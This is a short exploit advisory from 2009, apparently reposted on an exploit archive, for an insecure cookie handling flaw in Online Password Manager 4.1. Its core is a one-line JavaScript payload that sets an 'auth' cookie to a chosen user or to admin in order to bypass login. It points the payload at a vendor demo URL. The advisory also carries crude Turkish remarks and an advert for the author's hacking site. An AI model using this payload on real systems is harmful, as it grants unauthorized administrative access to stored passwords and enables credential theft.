id: 5047
date: 04/15/2009
title: Online Password Manager 4.1 Insecure Cookie Handling Vulnerability
author: ZoRLu
cves: 

==================================================================
Online Password Manager 4.1 Insecure Cookie Handling Vulnerability
==================================================================


[~] Online Password Manager v4.1 Insecure Cookie Handling Vulnerability 
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 15.04.2009
[~]
[~] N0T: Herkes Hecker Olmus :S yav siktirin gidin mal mal gelip msn de konusmayIn :S Herkes Ustune AlInmasIn anlayan anladI :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------


yildirimordulari.com/OPM/main.php

Exploit:

javascript:document.cookie = "auth=[nick]; path=/";


Exploit for demo:

http://www.esoftpro.com/demo/OPM/main.php

javascript:document.cookie = "auth=admin; path=/";


[~] ----------------------------------------------------------------------



#  0day.today [2023-03-22]  #